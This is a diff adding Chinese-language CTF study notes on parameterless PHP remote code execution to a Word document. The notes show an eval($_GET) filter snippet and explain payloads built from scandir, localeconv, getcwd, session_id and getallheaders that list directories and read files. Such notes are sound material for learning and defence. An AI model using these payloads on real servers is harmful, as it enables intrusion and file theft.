--- a/命令执行拓展.docx
+++ b/命令执行拓展.docx
@@ -2,6 +2,926 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpsCustomData="http://www.wps.cn/officeDocument/2013/wpsCustomData" mc:Ignorable="w14 w15 wp14">
   <w:body>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>========================无参rce==========================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    eval($_GET['star']);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>如上一样的代码是无参rce题目的特征，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>[^\W]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 匹配了一个或多个函数名</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(?R)?\)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 匹配了（）</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>和其里面的内容</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>如果函数调用了参数就会被过滤，例如：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>system();</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ✔ system(ls); ×</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>方法一：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>scandir()  最常规的通解</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>因此我们需要不使用参数来执行我们的恶意代码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="5273040" cy="2466975"/>
+            <wp:effectExtent l="0" t="0" r="10160" b="9525"/>
+            <wp:docPr id="4" name="图片 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="4" name="图片 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId4"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5273040" cy="2466975"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="C00000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="C00000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>关于Localeconv</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>乍一看这个函数跟文件读取也没关系啊，但就是这个占不到边的函数也能玩出新花样。它返回的是一个数组，数组的第一行是一个点（.） 这个点就可以代表当前目录了，我们可以用current()函数取出这个点。取出这个点之后，再用scandir函数进行目录遍历。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>因此payload构造为：var_dump(scandir(current(localeconv())));相当于var_dump(scandir(.));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>end() ： 将内部指针指向数组中的最后一个元素，并输出</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>next() ：将内部指针指向数组中的下一个元素，并输出</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>prev() ：将内部指针指向数组中的上一个元素，并输出</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>reset() ： 将内部指针指向数组中的第一个元素，并输出</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>each() ： 返回当前元素的键名和键值，并将内部指针向前移动</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>一些payload：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>highlight_file(array_rand(array_flip(scandir(getcwd())))); //查看和读取当前目录文件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>print_r(scandir(dirname(getcwd()))); //查看上一级目录的文件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>方法二</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>session_id()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>使用条件：当请求头中有cookie时（或者走投无路手动添加cookie头也行，有些CTF题不会卡） 首先我们需要开启</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>session_start()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>来保证session_id()的使用，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>session_id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>可以用来获取当前会话ID</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="6015990" cy="2336165"/>
+            <wp:effectExtent l="0" t="0" r="3810" b="635"/>
+            <wp:docPr id="5" name="图片 2" descr="IMG_256"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="5" name="图片 2" descr="IMG_256"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6015990" cy="2336165"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>做法如下：url传入对应参数readfile(session_id(session_start()));使之读取sessionid</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>同时sessionid传入我们要读取的文件名</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>方法三：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>getallheaders()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getallheaders()返回当前请求的所有请求头信息，局限于Apache</w:t>
+      </w:r>
+    </w:p>
